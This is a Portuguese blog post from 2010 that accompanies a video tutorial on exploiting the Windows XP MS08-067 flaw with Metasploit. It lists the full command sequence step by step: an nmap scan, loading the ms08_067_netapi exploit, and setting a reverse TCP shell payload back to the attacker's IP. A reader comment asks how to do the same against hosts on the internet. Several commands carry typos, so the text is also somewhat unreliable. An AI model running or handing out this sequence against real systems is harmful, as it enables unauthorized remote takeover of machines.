Nessa video aula mostro como usar o metasploit para explorar falha de segurança no sistema operacional Windows XP profissional sp2, que permite execução remota.
Programas usados:
Metasploit framework 3
Nmap
Exploit usado:
ms08_067_netapi
shell_reverse_tcp
Solução da falha: Clique aqui
Comandos:
nmap -sS -O Ip_do_alvo
cd /pentest/exploits/framework3
./msfconsole
show exploits
use windown/smb/ms08_067_netapi
show options
set rhots IP_do_alvo
set rport Porta
set payload /windows/shell/reverse_tcp
set lhost Meu_IP
set id "0" (0 e para encontrar o windows automaticamente, caso não encontre, digitar "info" vai ter o id de vários windows)
exploit
Baixar: http://www.4shared.com/file/692nIMUK/Metasploit-ms08_067_netapi.htm
Assistir on-line: http://bhior.blip.tv/file/3534979
quinta-feira, 13 de maio de 2010
Metasploit - Explorando falha MS08-067
Citação:
Citação:
Citação:
Assinar:
Postar comentários (Atom)
Beleza valeu pela dica ,
ResponderExcluirbhior você poderia nos mostrar como seria com ip externos sem ser da propria rede! usar o metasploit para internet
valeu......
Olá Bhior, utilizei essa tecnica e me retornou o seguinte erro. Login Failed. Execution Expired.
ResponderExcluirAlguma falha de login? Teria como eu setar o login a ser usado? Pois a maquina na qual tentei conectar eu tenho todas as senhas de acesso.
Valeu!